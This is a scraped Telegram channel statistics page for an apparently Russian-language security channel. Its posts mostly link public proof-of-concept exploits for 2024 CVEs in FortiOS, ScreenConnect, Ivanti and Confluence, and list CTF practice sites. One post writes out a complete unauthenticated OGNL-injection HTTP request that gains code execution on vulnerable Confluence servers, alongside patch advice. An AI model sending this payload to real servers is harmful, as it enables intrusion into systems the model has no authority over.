313
Subscribers
+224 hours
+127 days
+3130 days
Data loading in progress...
Similar Channels
Tags Cloud
No data
Any problems? Please refresh the page or contact our support manager.
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
September '24
September '24
+27
in 0 channels
August '24
+52
in 0 channels
Get PRO
July '24
+44
in 0 channels
Get PRO
June '24
+39
in 0 channels
Get PRO
May '24
+64
in 0 channels
Get PRO
April '24
+148
in 1 channels
Get PRO
March '240
in 0 channels
Get PRO
February '24
+2
in 0 channels
Get PRO
January '24
+169
in 0 channels
Get PRO
December '23
+194
in 0 channels
| Date | Subscriber Growth | Mentions | Channels | |
| 25 September | 0 | |||
| 24 September | 0 | |||
| 23 September | +1 | |||
| 22 September | 0 | |||
| 21 September | +3 | |||
| 20 September | 0 | |||
| 19 September | 0 | |||
| 18 September | +1 | |||
| 17 September | +1 | |||
| 16 September | 0 | |||
| 15 September | 0 | |||
| 14 September | +1 | |||
| 13 September | +2 | |||
| 12 September | 0 | |||
| 11 September | +2 | |||
| 10 September | +1 | |||
| 09 September | 0 | |||
| 08 September | +2 | |||
| 07 September | +3 | |||
| 06 September | +2 | |||
| 05 September | +4 | |||
| 04 September | 0 | |||
| 03 September | +3 | |||
| 02 September | 0 | |||
| 01 September | +1 |
Channel Posts
CVE-2024-21762: Fortinet FortiOS и FortiProxy «sslvpnd» — удаленное выполнение кода без проверки подлинности (OOB)
😈 POC : https://github.com/h4x0r-dz/CVE-2024-21762 .
❗️ Версия: https://www.fortiguard.com/psirt/FG-IR-24-015 .
🟢 Блог/POC: https://www.assetnote.io/resources/research/two-bytes-is-plenty-fortigate-rce-with-cve-2024-21762
| 2 | :-( | 304 |
| 3 | https://netacad.sadlab.su/ | 518 |
| 4 | 🔥CVE-2024-1709 : ConnectWise SecureConnect <= 23.9.7 - Authentication Bypass & Unauthenticated Remote Code Execution module (Updated)
🟢POC : https://github.com/horizon3ai/SecureConnect-Auth-Bypass [2] , [3]
📺Blog :
https://www.horizon3.ai/attack-research/red-team/connectwise-screenconnect-auth-bypass-deep-dive/
☠️Analysis (CVE-2024-1709 & CVE-2024-1708) :
https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
🔥Module RCE : https://github.com/rapid7/metasploit-framework/pull/18870 | 522 |
| 5 | ▪️ Hack The Box - win, *nix машины для самостоятельного взлома. Во free всегда доступно 20 машин. Обучение, академия, лабы и т.д.
▪️ TryHackMe - аналог HTB
▪️ PortSwigger - академия веб пентеста от создателей BurpSuite
▪️ CTFtime - почти все CTF соревнования можно найти здесь
▪️ Codeby.games - Русскоязычная площадка. CTF задачи в различных категориях
▪️ CryptoHack - нравится криптография ? Вам сюда, от азов до сложнейших задач
▪️ Kontra - appsec тренировки, owasp top10, owasp api top10, aws top10 и т.д.
▪️ Linux Journey - путешествие в мир Linux, основные команды, лабы, руководства
▪️ OverTheWire Bandit - игра из 34 уровней для изучения Linux
▪️ Crackmes one - большое количество крякми для изучения. Подойдет реверсерам
▪️ pwnable tw - для любителей бинарной эксплуатации (PWN) | 374 |
| 6 | fbi.gov_ru.txt | 315 |
| 7 | No text... | 326 |
| 8 | я пока еще отдыхаю, сладкие мои❤️
чуть позже чат открою, как было все | 331 |
| 9 | No text... | 151 |
| 10 | 🔥CVE-2024-22024 : Ivanti Connect Secure 9.x, 22.x & Ivanti Policy Secure 9.x, 22.x & ZTA Gateways 22.6R1.3 'SAML Component' - Unauthenticated XML External Entity (XXE)
🟢POC N/A : https://github.com/0dteam/CVE-2024-22024
🔥CVE-2023-46805 : Ivanti Connect Secure 9.x, 22.x & Ivanti Policy Secure 9.x, 22.x 'Web Component' - Authentication Bypass
🟢SCAN : https://github.com/Chocapikk/CVE-2023-46805
🔥CVE-2024-21887 : Ivanti Connect Secure 9.x, 22.x & Ivanti Policy Secure 9.x, 22.x 'Web Component' - (Authenticated Administrator) Arbitrary Command Execution
🟢POC N/A : https://github.com/imhunterand/CVE-2024-21887
🤩High Signal Detection and Exploitation of Ivanti's Pulse Connect Secure Auth Bypass & RCE
➡️Blog : https://www.assetnote.io/resources/research/high-signal-detection-and-exploitation-of-ivantis-pulse-connect-secure-auth-bypass-rce | 153 |
| 11 | ГОТОВЫ ? | 141 |
| 12 | НУ ЧЕ ЕБАТЬ | 140 |
| 13 | скачал себе циско крч, займу себя делом | 274 |
| 14 | оставил чисто для того, чтобы каждый взял от сюда то, что ему(ей) нужно | 94 |
| 15 | да, думаю и так все понятно | 89 |
| 16 | reviOS vs Wizard | 765 |
| 17 | Детали уязвимости CVE-2023-22527 (оценка по CVSS3.0=10), позволяющей получить RCE в Atlassian Confluence известны уже пару дней, но не все почему-то спешат обновлять свои сервера. 🤷♂️
Согласно данным Censys, которые обновляются ежедневно в отношении всего пространства IPv4, в нашей стране на сегодняшний день~3.6k скомпрометированных торчащих в интернет серверов Confluence. Технические детали уязвимости опубликованы в блоге ProjectDiscovery, эксплуатация позволяет не аутентифицированному злоумышленнику получить возможность исполнения произвольного кода путем SSTI инъекции OGNL (Object-Graph Navigation Language)
POST /template/aui/text-inline.vm HTTP/1.1
Host: сonfluence:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
⚙️POC: https://github.com/VNCERT-CC/CVE-2023-22527-confluence
🪲Уязвимые версии ПО: 8.0.x - 8.5.3
✅ Рекомендации: Патч уже доступен, необходимо ASAP обновиться до версии 8.5.3
#confluence #CVE-2023-22527 | 795 |
| 18 | 🔥🔥🔥CVE-2023-22527 : Atlassian Confluence 8.0.x - Unauthenticated Remote Code Execution (inject OGNL)
🟢POC / Blog : https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
🟥NIST : https://nvd.nist.gov/vuln/detail/CVE-2023-22527 | 596 |
| 19 | sticker.webp | 638 |
| 20 | sticker.webp | 710 |
